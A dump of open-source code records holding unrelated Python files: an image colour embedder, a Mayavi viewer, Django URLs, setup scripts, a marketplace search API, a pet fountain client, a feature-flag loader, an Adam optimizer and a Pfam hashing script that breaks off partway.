+{"seq_id":"539905351","text":"import numpy as np\nfrom PIL import Image\n\n\nclass ColorEmbedder:\n \"\"\"A class for embedding color information from an image.\"\"\"\n\n def __init__(self, n_bins: int = 8, alpha: float = 5):\n \"\"\"\n Initialize the ColorEmbedder object.\n\n Args:\n n_bins (int):\n Number of color bins to use.\n alpha (float):\n Standard deviation of the noise added to each pixel.\n\n \"\"\"\n self.n_bins = n_bins\n self.bins = np.linspace(0, 255, n_bins + 1)\n self.alpha = alpha\n\n def embed(self, image: Image) -> np.ndarray:\n \"\"\"\n Embed color information from the given image.\n\n The embedding process involves resizing the image, converting it to RGB,\n and creating a color histogram. The histogram is composed of n_bins^3\n bins, where n_bins is the number of bins in each dimension (red, green,\n blue). Each pixel in the image is repeated 10 times and some noise is\n added to each pixel. This allows colours near the bin boundaries to fall\n into multiple bins, making the embedding more robust.\n\n Args:\n image (PIL.Image.Image):\n The input image.\n\n Returns:\n np.ndarray:\n The flattened color histogram as a 1D numpy array.\n\n \"\"\"\n rgb_image = image.convert(\"RGB\").resize(\n (50, 50),\n # resample using nearest neighbour to preserve the original colours.\n # using the default resample method (bicubic) will result in a\n # blurring/blending of colours\n resample=Image.NEAREST,\n )\n\n pixel_array = np.array(rgb_image).reshape(-1, 3)\n\n repeated_pixel_array = np.repeat(pixel_array, 10, axis=0)\n noise = np.random.normal(0, self.alpha, repeated_pixel_array.shape)\n pixel_array = repeated_pixel_array + noise\n\n histogram, _ = np.histogramdd(\n pixel_array,\n bins=[self.bins, self.bins, self.bins],\n )\n\n # make sure the vector is of unit length\n histogram = histogram / np.linalg.norm(histogram)\n\n return histogram.flatten()\n","sub_path":"knn-colours/pipeline/src/embedder.py","file_name":"embedder.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"597759155","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2018/10/10 21:06\n# @Author : BingZhen Zhou\n# @contact : zbzhen@smail.hunnu.edu.cn\n# @File : demo.py\n# @version : Python 2.7.6\nfrom pointLinePlane import spaceElement, Frame, Axis, getcubepoints, setSCALING\nimport numpy as np\nfrom enthought.traits.api import HasTraits, Float, Int, Bool, Range, Str, Button, Instance\nfrom enthought.traits.ui.api import View, HSplit, Item, VGroup, EnumEditor, RangeEditor\nfrom enthought.tvtk.pyface.scene_editor import SceneEditor\nfrom enthought.mayavi.tools.mlab_scene_model import MlabSceneModel\nfrom enthought.mayavi.core.ui.mayavi_scene import MayaviScene\nfrom enthought.mayavi import mlab\nfrom tvtk.api import tvtk\nfrom tvtk.common import configure_input_data\n\n\n\nclass FieldViewer(HasTraits):\n \"\"\"三维标量场观察器\"\"\"\n\n # 三个轴的取值范围\n x0, x1 = Float(-5), Float(5)\n y0, y1 = Float(-5), Float(5)\n z0, z1 = Float(-5), Float(5)\n points = Int(50) # 分割点数\n autocontour = Bool(True) # 是否自动计算等值面\n v0, v1 = Float(0.0), Float(1.0) # 等值面的取值范围\n contour = Range(\"v0\", \"v1\", 0.5) # 等值面的值\n function = Str(\"x*x*0.5 + y*y + z*z*2.0\") # 标量场函数\n function_list = [\n \"x*x*0.5 + y*y + z*z*2.0\",\n \"x*y*0.5 + sin(2*x)*y +y*z*2.0\",\n \"x*y*z\",\n \"np.sin((x*x+y*y)/z)\"\n ]\n plotbutton = Button(u\"描画\")\n scene = Instance(MlabSceneModel, ()) # mayavi场景\n\n view = View(\n HSplit(\n VGroup(\n \"x0\",\"x1\",\"y0\",\"y1\",\"z0\",\"z1\",\n Item('points', label=u\"点数\"),\n Item('autocontour', label=u\"自动等值\"),\n Item('plotbutton', show_label=False),\n ),\n VGroup(\n Item('scene',\n editor=SceneEditor(scene_class=MayaviScene), # 设置mayavi的编辑器\n resizable=True,\n height=300,\n width=350\n ),\n Item('function',\n editor=EnumEditor(name='function_list', evaluate=lambda x:x)),\n Item('contour',\n editor=RangeEditor(format=\"%1.2f\",\n low_name=\"v0\", high_name=\"v1\")\n ), show_labels=False\n )\n ),\n width = 500, resizable=True, title=u\"三维标量场观察器\"\n )\n\n def _plotbutton_fired(self):\n self.plot()\n\n\n # def _autocontour_changed(self):\n # \"自动计算等值平面的设置改变事件响应\"\n # if hasattr(self, \"g\"):\n # self.g.contour.auto_contours = self.autocontour\n # if not self.autocontour:\n # self._contour_changed()\n #\n #\n # def _contour_changed(self):\n # \"等值平面的值改变事件响应\"\n # if hasattr(self, \"g\"):\n # if not self.g.contour.auto_contours:\n # self.g.contour.contours = [self.contour]\n\n\n def plot(self):\n # mlab.figure(fgcolor=(0, 0, 1.0), bgcolor=(1.0, 1.0, 1.0), size=(700, 700))\n setSCALING(4)\n mlab.clf()\n v = mlab.gcf(engine=None)\n v.scene.background = (1, 1, 1)\n v.scene.foreground = (0, 0, 1)\n\n Axis(1.5,1.5,1.5).plot(arraymode=\"2darrow\")\n\n A = spaceElement([1,0,0])\n B = spaceElement([0,1,0])\n C = spaceElement([0,0,1])\n P = spaceElement([0,0,0])\n D = spaceElement([0.5,0.5,0])\n\n\n spaceElement(C, D).plot(linestyle=\"dashed\", color=(0,1,0))\n\n # spaceElement(A, B).plot()\n\n D.plot()\n A.plot()\n B.plot()\n C.plot()\n aa = A.plotText(\"A\",0.1)\n\n # B.plotText(\"B\")\n # C.plotText(\"C\")\n t = D.plotText(\"D\")\n # spaceElement(A, B, C).plotLine()\n\n ps = getcubepoints()\n a = [spaceElement(p) for p in ps]\n Frame(a[:4], a[4:]).plot()\n # spaceElement(a[0],a[2],a[4],a[6]).plotLine()\n\n spaceElement(a[0],a[2],a[6],a[4]).plot(colormap=\"Spectral\", opacity=self.contour)\n ABC = spaceElement(A, B, C)\n ABC.plot(colormap=\"Accent\", opacity=self.contour)\n ABC.getPerpendicularLine(a[0]).plot()\n # # print spaceElement(A, B, C).getDistanceFromPoint(a[7])\n # spaceElement(A, C).getParallelLine(D).plot()\n # spaceElement(A, C).getPerpendicularLine(D).plot()\n\n\n\n\n\n # And display text\n vtext = tvtk.VectorText()\n vtext.text = 'm'\n text_mapper = tvtk.PolyDataMapper()\n configure_input_data(text_mapper, vtext.get_output())\n vtext.update()\n p2 = tvtk.Property(color=(0, 0.3, 0.3))\n text_actor = tvtk.Follower(mapper=text_mapper, property=p2)\n text_actor.position = (0, 0, 0)\n v.scene.add_actor(text_actor)\n\n\n\n\napp = FieldViewer()\napp.configure_traits()\n\n\n\n\n\n\n","sub_path":"moviepy/三维动画课件/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":4848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"264795216","text":"from django.conf.urls import patterns, include, url\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n url(r'^$', 'restaurants.views.home', name='home'),\n url(r'^contact/$', 'restaurants.views.contact', name='contact'),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^restaurants/$', 'restaurants.views.restaurant_list', name='restaurant_list'),\n url(r'^restaurants/(?P\\d+)/$', 'restaurants.views.restaurant_detail', name='restaurant_detail'),\n url(r'^restaurants/(?P\\d+)/review/$', 'restaurants.views.write_review', name='restaurant_review'),\n)","sub_path":"intro-track/eatwell/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"536204496","text":"from setuptools import setup, find_packages\nimport os\n\nversion = '1.3.0'\n\nsetup(name='collective.contentfiles2aws',\n version=version,\n description=\"Allows to store files and images on amazon s3 service.\",\n long_description=open(\"README.txt\").read() + \"\\n\" +\n open(os.path.join(\"docs\", \"HISTORY.txt\")).read(),\n classifiers=[\"Programming Language :: Python\"],\n keywords='Plone AWS',\n author='Taras Melnychuk',\n author_email='melnychuktaras@gmail.com',\n url='https://github.com/martinschoel/collective.contentfiles2aws.git',\n license='GPL',\n packages=find_packages(exclude=['ez_setup']),\n namespace_packages=['collective'],\n include_package_data=True,\n zip_safe=False,\n install_requires=[\n 'setuptools',\n 'boto',\n ],\n extras_require={'tests': ['plone.app.testing']},\n entry_points=\"\"\"\n # -*- Entry points: -*-\n [z3c.autoinclude.plugin]\n target = plone\n \"\"\",\n )\n","sub_path":"pypi_install_script/collective.contentfiles2aws-1.3.0.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"59301738","text":"from django.conf.urls import url\n\nimport waffle\nfrom tastypie.authorization import ReadOnlyAuthorization\nfrom tastypie.throttle import BaseThrottle\nfrom tastypie.utils import trailing_slash\n\nfrom translations.helpers import truncate\n\nimport mkt\nfrom mkt.api.authentication import (SharedSecretAuthentication,\n OptionalOAuthAuthentication)\nfrom mkt.api.base import CORSResource, MarketplaceResource\nfrom mkt.api.resources import AppResource\nfrom mkt.api.serializers import SuggestionsSerializer\nfrom mkt.collections.constants import (COLLECTIONS_TYPE_BASIC,\n COLLECTIONS_TYPE_FEATURED,\n COLLECTIONS_TYPE_OPERATOR)\nfrom mkt.collections.filters import CollectionFilterSetWithFallback\nfrom mkt.collections.models import Collection\nfrom mkt.collections.serializers import CollectionSerializer\nfrom mkt.constants.features import FeatureProfile\nfrom mkt.search.views import _filter_search\nfrom mkt.search.forms import ApiSearchForm\nfrom mkt.webapps.models import Webapp\nfrom mkt.webapps.utils import es_app_to_dict\n\n\nclass SearchResource(CORSResource, MarketplaceResource):\n\n class Meta(AppResource.Meta):\n resource_name = 'search'\n allowed_methods = []\n detail_allowed_methods = []\n list_allowed_methods = ['get']\n authorization = ReadOnlyAuthorization()\n authentication = (SharedSecretAuthentication(),\n OptionalOAuthAuthentication())\n slug_lookup = None\n # Override CacheThrottle with a no-op.\n throttle = BaseThrottle()\n\n def get_resource_uri(self, bundle):\n # Link to the AppResource URI.\n return AppResource().get_resource_uri(bundle.obj)\n\n def get_search_data(self, request):\n form = ApiSearchForm(request.GET if request else None)\n if not form.is_valid():\n raise self.form_errors(form)\n return form.cleaned_data\n\n def get_feature_profile(self, request):\n profile = None\n if request.GET.get('dev') in ('firefoxos', 'android'):\n sig = request.GET.get('pro')\n if sig:\n profile = FeatureProfile.from_signature(sig)\n return profile\n\n def get_region(self, request):\n return getattr(request, 'REGION', mkt.regions.WORLDWIDE)\n\n def get_query(self, request, base_filters=None):\n region = self.get_region(request)\n return Webapp.from_search(request, region=region, gaia=request.GAIA,\n mobile=request.MOBILE, tablet=request.TABLET,\n filter_overrides=base_filters)\n\n def apply_filters(self, request, qs, data=None):\n # Build device features profile filter.\n profile = self.get_feature_profile(request)\n\n # Build region filter.\n region = self.get_region(request)\n\n return _filter_search(request, qs, data, region=region,\n profile=profile)\n\n def paginate_results(self, request, qs):\n paginator = self._meta.paginator_class(request.GET, qs,\n resource_uri=self.get_resource_list_uri(),\n limit=self._meta.limit)\n page = paginator.page()\n page['objects'] = self.rehydrate_results(request, page['objects'])\n return page\n\n def rehydrate_results(self, request, qs):\n # Rehydrate the results as per tastypie.\n objs = []\n for obj in qs:\n obj.pk = obj.id\n objs.append(self.build_bundle(obj=obj, request=request))\n return [self.full_dehydrate(bundle) for bundle in objs]\n\n def get_list(self, request=None, **kwargs):\n form_data = self.get_search_data(request)\n\n base_filters = {\n 'type': form_data['type'],\n }\n\n qs = self.get_query(request, base_filters=base_filters)\n qs = self.apply_filters(request, qs, data=form_data)\n page = self.paginate_results(request, qs)\n\n # This isn't as quite a full as a full TastyPie meta object,\n # but at least it's namespaced that way and ready to expand.\n to_be_serialized = self.alter_list_data_to_serialize(request, page)\n return self.create_response(request, to_be_serialized)\n\n def dehydrate(self, bundle):\n obj = bundle.obj\n amo_user = getattr(bundle.request, 'amo_user', None)\n\n bundle.data.update(es_app_to_dict(obj, region=bundle.request.REGION.id,\n profile=amo_user,\n request=bundle.request))\n\n return bundle\n\n def override_urls(self):\n return [\n url(r'^(?P%s)/featured%s$' %\n (self._meta.resource_name, trailing_slash()),\n self.wrap_view('with_featured'), name='api_with_featured'),\n ]\n\n def with_featured(self, request, **kwargs):\n return WithFeaturedResource().dispatch('list', request, **kwargs)\n\n\nclass WithFeaturedResource(SearchResource):\n\n class Meta(SearchResource.Meta):\n authorization = ReadOnlyAuthorization()\n authentication = OptionalOAuthAuthentication()\n detail_allowed_methods = []\n fields = SearchResource.Meta.fields + ['id', 'cat']\n list_allowed_methods = ['get']\n resource_name = 'search/featured'\n slug_lookup = None\n\n def create_response(self, *args, **kwargs):\n response = super(WithFeaturedResource, self).create_response(\n *args, **kwargs)\n filter_fallbacks = getattr(self, 'filter_fallbacks', {})\n for name, value in filter_fallbacks.items():\n response['API-Fallback-%s' % name] = ','.join(value)\n return response\n\n def collections(self, request, collection_type=None, limit=1):\n filters = request.GET.dict()\n filters.setdefault('region', self.get_region(request).slug)\n if collection_type is not None:\n qs = Collection.public.filter(collection_type=collection_type)\n else:\n qs = Collection.public.all()\n qs = CollectionFilterSetWithFallback(filters, queryset=qs).qs\n serializer = CollectionSerializer(qs[:limit],\n context={'request': request})\n return serializer.data, getattr(qs, 'filter_fallback', None)\n\n def alter_list_data_to_serialize(self, request, data):\n\n if waffle.switch_is_active('rocketfuel'):\n types = (\n ('collections', COLLECTIONS_TYPE_BASIC),\n ('featured', COLLECTIONS_TYPE_FEATURED),\n ('operator', COLLECTIONS_TYPE_OPERATOR),\n )\n self.filter_fallbacks = {}\n for name, col_type in types:\n data[name], fallback = self.collections(request,\n collection_type=col_type)\n if fallback:\n self.filter_fallbacks[name] = fallback\n else:\n form_data = self.get_search_data(request)\n region = getattr(request, 'REGION', mkt.regions.WORLDWIDE)\n cat_slug = form_data.get('cat')\n if cat_slug:\n cat_slug = [cat_slug]\n\n # Filter by device feature profile.\n profile = self.get_feature_profile(request)\n\n qs = Webapp.featured(cat=cat_slug, region=region, profile=profile)\n\n bundles = (self.build_bundle(obj=obj, request=request) for obj in\n qs)\n data['featured'] = [AppResource().full_dehydrate(bundle)\n for bundle in bundles]\n\n # Alter the _view_name so that statsd logs seperately from search.\n request._view_name = 'featured'\n\n return data\n\n\nclass SuggestionsResource(SearchResource):\n\n class Meta(SearchResource.Meta):\n authorization = ReadOnlyAuthorization()\n fields = ['name', 'manifest_url']\n resource_name = 'suggest'\n limit = 10\n serializer = SuggestionsSerializer(['suggestions+json'])\n\n def determine_format(self, request):\n return 'application/x-suggestions+json'\n\n def get_search_data(self, request):\n data = super(SuggestionsResource, self).get_search_data(request)\n self.query = data.get('q', '')\n return data\n\n def alter_list_data_to_serialize(self, request, data):\n return data\n\n def paginate_results(self, request, qs):\n return self.rehydrate_results(request, qs[:self._meta.limit])\n\n def rehydrate_results(self, request, qs):\n names = []\n descriptions = []\n urls = []\n icons = []\n for obj in qs:\n # Tastypie expects obj.pk to be present, so set it manually.\n obj.pk = obj.id\n data = self.full_dehydrate(self.build_bundle(obj=obj,\n request=request))\n names.append(data['name'])\n descriptions.append(data['description'])\n urls.append(data['absolute_url'])\n icons.append(data['icon'])\n return [self.query, names, descriptions, urls, icons]\n\n def dehydrate(self, bundle):\n data = super(SuggestionsResource, self).dehydrate(bundle).data\n return {\n 'description': truncate(data['description']),\n 'name': data['name'],\n 'absolute_url': data['absolute_url'],\n 'icon': data['icons'][64],\n }\n","sub_path":"mkt/search/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":9426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"498836596","text":"\"\"\"\nHolds device status information for an individual Petoneer smart pet fountain\n\"\"\"\nfrom datetime import time, date, datetime\nimport json\n\nfrom petoneerErrors import *\nfrom petoneerFountainDetails import *\nfrom petoneerHelpers import *\n\nclass PetoneerFountain:\n\n \"\"\"\n Class to interface with the cloud-based API for the Revogi Smart Home equipment\n \"\"\"\n\n def __init__(self, fountain_serial_number:str, api_access_token:str):\n self._id = fountain_serial_number\n self._access_token = api_access_token\n self._device_info_json = None\n self._device_info_last_updated = None\n self._device_schedule_info_json = None\n self._pump = PetoneerFountainDetails_PumpDetails(self)\n self._water = PetoneerFountainDetails_WaterDetails(self)\n self._filter = PetoneerFountainDetails_FilterDetails(self)\n self._led_display = PetoneerFountainDetails_LedDetails(self)\n\n # Initialise property values based on provided JSON data\n self.update()\n\n def to_json(self):\n return json.dump(self)\n #return json.dumps(self, indent = 4, default=lambda o: o.__dict__)\n\n # def __str__(self):\n # return self.to_json(self)\n\n def _debug(self, msg):\n print(msg)\n #pass\n return\n\n def update(self):\n # Retrieve up-to-date info from server API if last update was more than \n # 15 seconds ago...\n if (self._device_info_last_updated == None) or (\n (datetime.now() - self._device_info_last_updated).total_seconds() > 30):\n \n self._getDeviceDetails()\n\n # Update all values based on new device info JSON data\n self._pump.update(self._device_info_json, self._device_schedule_info_json)\n self._water.update(self._device_info_json)\n self._filter.update(self._device_info_json)\n self._led_display.update(self._device_info_json)\n ##\n ## TODO: Parse JSON and update properties with new values\n\n def _getDeviceDetails(self):\n if (self._id == \"\"):\n raise PetoneerInvalidArgument('PetoneerFountain._req', 'PetoneerFountain.device_id', 'The device serial number must be provided')\n\n if (Debug):\n print(f\"Getting details for device {self._id}\")\n\n payload = { \n \"sn\": self._id, \n \"protocol\": \"3\" \n }\n\n #\n # Request main device details from Petoneer API\n #\n resp = PetoneerHelpers.getAPIrequest(API_DEVICE_DETAILS_PATH, payload, self._access_token)\n\n if(resp.status_code == 200):\n json_resp = resp.json()\n\n if (json_resp['code'] == 200):\n self._device_info_json = json_resp['data']\n else:\n raise PetoneerInvalidServerResponse(resp.http_code, resp.url, resp.text, 'Unable to obtain Petoneer Fountain device details - Unexpected Server Response')\n else:\n raise PetoneerServerError(resp.status_code, resp.url, resp.text, 'Unable to obtain Petoneer Fountain device details - Server Error')\n\n #\n # Second API call to obtain any configured fountain operating schedule info\n #\n resp = PetoneerHelpers.getAPIrequest(API_DEVICE_SCHEDULE_DETAILS_PATH, payload, self._access_token)\n\n if(resp.status_code == 200):\n json_resp = resp.json()\n\n if (json_resp['code'] == 200):\n self._device_schedule_info_json = json_resp['data']\n else:\n raise PetoneerInvalidServerResponse(resp.http_code, resp.url, resp.text, 'Unable to obtain Petoneer Fountain device details - Unexpected Server Response')\n else:\n raise PetoneerServerError(resp.status_code, resp.url, resp.text, 'Unable to obtain Petoneer Fountain device details - Server Error')\n\n self._device_info_last_updated = datetime.now()\n\n @property\n def device_id(self):\n return self._id\n\n @property\n def pump(self):\n return self._pump\n\n @property\n def water(self):\n return self._water\n\n @property\n def filter(self):\n return self._filter\n\n @property\n def led_display(self):\n return self._led_display\n\n# -------------------------------------------------\n","sub_path":"petoneerFountain.py","file_name":"petoneerFountain.py","file_ext":"py","file_size_in_byte":4249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"314993784","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n#-----------------------------------------------------------------------------\n# Purpose: menu item, find by id\n#-----------------------------------------------------------------------------\n\nimport wx\n\nclass Frame(wx.Frame):\n\n def __init__(self):\n super(self.__class__, self).__init__(parent=None, id=-1, title='Find Item by Id', size=(400, 250))\n panel = wx.Panel(parent=self)\n\n self.txt = wx.TextCtrl(parent=panel, id=-1, value='&New Item')\n btn = wx.Button(parent=panel, id=-1, label='Add Menu Item')\n self.Bind(event=wx.EVT_BUTTON, handler=self.OnAddItem, source=btn)\n\n sizer = wx.BoxSizer(wx.HORIZONTAL)\n sizer.Add(item=(-1, -1), proportion=1)\n sizer.Add(item=self.txt, proportion=0, flag=wx.ALIGN_CENTER_VERTICAL)\n sizer.Add(item=btn, proportion=0, flag=wx.ALIGN_CENTER_VERTICAL|wx.LEFT, border=5)\n sizer.Add(item=(-1, -1), proportion=1)\n panel.SetSizer(sizer)\n\n self.menu = wx.Menu()\n simple = self.menu.Append(id=-1, text='&Simple', help='', kind=wx.ITEM_NORMAL)\n self.menu.AppendSeparator()\n exit = self.menu.Append(id=-1, text='E&xit', help='', kind=wx.ITEM_NORMAL)\n self.Bind(event=wx.EVT_MENU, handler=self.OnSimple, source=simple)\n self.Bind(event=wx.EVT_MENU, handler=self.OnExit, source=exit)\n\n mb = wx.MenuBar()\n mb.Append(menu=self.menu, title='&Menu')\n self.SetMenuBar(mb)\n\n # layout\n self.CenterOnScreen()\n\n def OnSimple(self, event):\n wx.MessageBox(message='You selected the simple menu item.')\n\n def OnExit(self, event):\n self.Close()\n\n def OnAddItem(self, event):\n item = self.menu.Insert(pos=1, id=-1, text=self.txt.GetValue(), help='', kind=wx.ITEM_NORMAL)\n self.Bind(event=wx.EVT_MENU, handler=self.OnNewItemSelected, source=item)\n\n def OnNewItemSelected(self, event):\n #wx.MessageBox(message='You selected a ' + self.txt.GetValue().replace('&', ''))\n mb = self.GetMenuBar()\n id = event.GetId()\n item = mb.FindItemById(id)\n text = item.GetText()\n wx.MessageBox(message='You selected is `%s`' % text.replace('&', ''))\n\n\nclass App(wx.App):\n\n def OnInit(self):\n frame = Frame()\n self.SetTopWindow(frame)\n frame.Show()\n return True\n\nif __name__ == '__main__':\n\n app = App()\n app.MainLoop()\n\n\n\n\n\n\n","sub_path":"use_menu_find_item_by_id_75.py","file_name":"use_menu_find_item_by_id_75.py","file_ext":"py","file_size_in_byte":2439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"258261861","text":"from fcache.cache import FileCache\nfrom UnleashClient.features import Feature\nfrom UnleashClient.strategies import ApplicationHostname, Default, GradualRolloutRandom, \\\n GradualRolloutSessionId, GradualRolloutUserId, UserWithId, RemoteAddress\nfrom UnleashClient.constants import FEATURES_URL\n\nSTRATEGY_TO_OBJECT = {\n \"applicationHostname\": ApplicationHostname,\n \"default\": Default,\n \"gradualRolloutRandom\": GradualRolloutRandom,\n \"gradualRolloutSessionId\": GradualRolloutSessionId,\n \"gradualRolloutUserId\": GradualRolloutUserId,\n \"remoteAddress\": RemoteAddress,\n \"userWithId\": UserWithId\n}\n\n\ndef _create_strategies(provisioning: dict) -> list:\n feature_strategies = []\n\n for strategy in provisioning:\n feature_strategies.append(STRATEGY_TO_OBJECT[strategy[\"name\"]](strategy[\"parameters\"]))\n\n return feature_strategies\n\n\ndef _create_feature(provisioning: dict) -> Feature:\n return Feature(name=provisioning[\"name\"],\n enabled=provisioning[\"enabled\"],\n strategies=_create_strategies(provisioning[\"strategies\"]))\n\n\ndef load_features(cache: FileCache,\n strategies: dict) -> None:\n \"\"\"\n Caching\n\n :param cache: Should be the cache class variable from UnleashClient\n :param strategies: Should be the features class variable from UnleashClient\n :return:\n \"\"\"\n # Pull raw provisioning from cache.\n feature_provisioning = cache[FEATURES_URL]\n\n # Parse provisioning\n parsed_features = {}\n feature_names = [d[\"name\"] for d in feature_provisioning[\"features\"]]\n\n for provisioning in feature_provisioning[\"features\"]:\n parsed_features[provisioning[\"name\"]] = provisioning\n\n # Delete old features/cache\n for feature in list(strategies.keys()):\n if feature not in feature_names:\n del strategies[feature]\n\n # Update existing objects\n for feature in list(strategies.keys()):\n feature_for_update = strategies[feature]\n\n feature_for_update.enabled = parsed_features[feature][\"enabled\"]\n feature_for_update.strategies = _create_strategies(parsed_features[feature][\"strategies\"])\n\n # Handle creation or deletions\n new_features = list(set(feature_names) - set(strategies.keys()))\n\n for feature in new_features:\n strategies[feature] = _create_feature(parsed_features[feature])\n","sub_path":"UnleashClient/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":2359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"460429453","text":"import numpy as np\nfrom .Optimizer import Optimizer\n\nclass AdamOptimizer(Optimizer):\n\n def __init__(self, beta1=0.9, beta2=0.999, epsilon=1e-8, t=2):\n \"\"\"\n v -- python dictionary containing the current velocity:\n v['dW' + str(l)] = ...\n v['db' + str(l)] = ...\n s -- python dictionary that will contain the exponentially weighted average of the squared gradient.\n s[\"dW\" + str(l)] = ...\n s[\"db\" + str(l)] = ...\n beta -- the momentum hyperparameter, scalar\n t -- \n \"\"\"\n super(AdamOptimizer, self).__init__()\n \n self.beta1 = beta1\n self.beta2 = beta2\n self.epsilon = epsilon\n self.t = t\n self.v = {}\n self.s = {}\n \n def initialize(self, layer_dims, initialization=\"he\"):\n \"\"\"\n Arguments:\n layer_dims -- python array (list) containing the dimensions of each layer in our network\n initialization -- defines the initialization method (\"random\" or \"he\")\n\n Returns:\n parameters -- python dictionary containing your parameters \"W1\", \"b1\", ..., \"WL\", \"bL\":\n Wl -- weight matrix of shape (layer_dims[l], layer_dims[l-1])\n bl -- bias vector of shape (layer_dims[l], 1)\n \"\"\"\n parameters = super(AdamOptimizer, self).initialize(layer_dims, initialization=\"he\")\n\n L = len(parameters) // 2 # number of layers in the neural networks\n\n # Initialize v, s. Input: \"parameters\". Outputs: \"v, s\".\n for l in range(L):\n self.v[\"dW\" + str(l + 1)] = np.zeros_like(parameters[\"W\" + str(l + 1)])\n self.v[\"db\" + str(l + 1)] = np.zeros_like(parameters[\"b\" + str(l + 1)])\n\n self.s[\"dW\" + str(l+1)] = np.zeros_like(parameters[\"W\" + str(l + 1)])\n self.s[\"db\" + str(l+1)] = np.zeros_like(parameters[\"b\" + str(l + 1)])\n \n return parameters\n \n def update_parameters(self, parameters, grads, learning_rate):\n \"\"\"\n Update parameters using Adam\n\n Arguments:\n parameters -- python dictionary containing your parameters \n grads -- python dictionary containing your gradients, output of L_model_backward\n learning_rate -- the learning rate, scalar.\n\n Returns:\n parameters -- python dictionary containing your updated parameters \n parameters[\"W\" + str(l)] = ... \n parameters[\"b\" + str(l)] = ...\n \"\"\"\n\n L = len(parameters) // 2 # number of layers in the neural network\n v_corrected = {} # Initializing first moment estimate, python dictionary\n s_corrected = {} # Initializing second moment estimate, python dictionary\n self.t += 1\n\n # Perform Adam update on all parameters\n for l in range(L):\n # Moving average of the gradients. Inputs: \"v, grads, beta1\". Output: \"v\".\n self.v[\"dW\" + str(l + 1)] = self.beta1 * self.v[\"dW\" + str(l + 1)] + (1 - self.beta1) * grads['dW' + str(l + 1)]\n self.v[\"db\" + str(l + 1)] = self.beta1 * self.v[\"db\" + str(l + 1)] + (1 - self.beta1) * grads['db' + str(l + 1)]\n\n # Compute bias-corrected first moment estimate. Inputs: \"v, beta1, t\". Output: \"v_corrected\".\n v_corrected[\"dW\" + str(l + 1)] = self.v[\"dW\" + str(l + 1)] / (1 - np.power(self.beta1, self.t))\n v_corrected[\"db\" + str(l + 1)] = self.v[\"db\" + str(l + 1)] / (1 - np.power(self.beta1, self.t))\n\n # Moving average of the squared gradients. Inputs: \"s, grads, beta2\". Output: \"s\".\n self.s[\"dW\" + str(l + 1)] = self.beta2 * self.s[\"dW\" + str(l + 1)] + (1 - self.beta2) * np.power(grads['dW' + str(l + 1)], 2)\n self.s[\"db\" + str(l + 1)] = self.beta2 * self.s[\"db\" + str(l + 1)] + (1 - self.beta2) * np.power(grads['db' + str(l + 1)], 2)\n\n # Compute bias-corrected second raw moment estimate. Inputs: \"s, beta2, t\". Output: \"s_corrected\".\n s_corrected[\"dW\" + str(l + 1)] = self.s[\"dW\" + str(l + 1)] / (1 - np.power(self.beta2, self.t))\n s_corrected[\"db\" + str(l + 1)] = self.s[\"db\" + str(l + 1)] / (1 - np.power(self.beta2, self.t))\n\n # Update parameters. Inputs: \"parameters, learning_rate, v_corrected, s_corrected, epsilon\". Output: \"parameters\".\n parameters[\"W\" + str(l + 1)] = parameters[\"W\" + str(l + 1)] - learning_rate * v_corrected[\"dW\" + str(l + 1)] / np.sqrt(self.s[\"dW\" + str(l + 1)] + self.epsilon)\n parameters[\"b\" + str(l + 1)] = parameters[\"b\" + str(l + 1)] - learning_rate * v_corrected[\"db\" + str(l + 1)] / np.sqrt(self.s[\"db\" + str(l + 1)] + self.epsilon)\n\n return parameters\n \n def __eq__(self, compare): \n if(compare == \"adam\"): \n return True\n else:\n return False","sub_path":"zeronn/optimizers/.ipynb_checkpoints/AdamOptimizer-checkpoint.py","file_name":"AdamOptimizer-checkpoint.py","file_ext":"py","file_size_in_byte":4898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"163822796","text":"import numpy as np\nimport scipy as sp\nimport matplotlib.pyplot as plt\nimport pickle\nimport datetime\nimport csv\nimport os\nimport math\n\n# SETUP\npf_loc = '../../data/pfams/Pfam-A.regions.tsv'\nout_loc = '/'.join(pf_loc.split('/')[0:-1]) + '/'\ndigits = 6\nbase = 16\nalphabet = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'\nordermag = np.array([base**i for i in range(digits)])\ncharkey = dict(zip(alphabet, range(len(alphabet))))\nhash2 = lambda x: int(np.dot(np.array([charkey[c] for c in x[2][:digits]]), ordermag))\n\nname_digits = 4 # digits in name; 5 for pfams, 4 for clans\n# power must be less than (but shouldn't be by much) number of generated digits, math.log(10**name_digits, 2)*2\n# previously, chosen 24 for 5 digits (33 max), 20 for 4 digits (26 max)\nshsize = 2**20\nndigit = int(round(math.log(shsize, 2)))\ndef hashp(x):\n bstr = [bin(int(x[i][-name_digits:], base=10))[2:] for i in range(len(x))]\n bstrp = ['0'*(max([int(math.ceil(float(ndigit)/float(len(x)))) - len(el), 0])) + el for el in bstr]\n hp = int(''.join([''.join([bstrp[i][-j] for i in range(len(x))])\n for j in range(1, 1+int(math.ceil(ndigit/float(len(x)))))])[0:ndigit], base=2)\n return hp\n\nthsnow = datetime.datetime.now()\ntimestr = ( str(thsnow.month) + 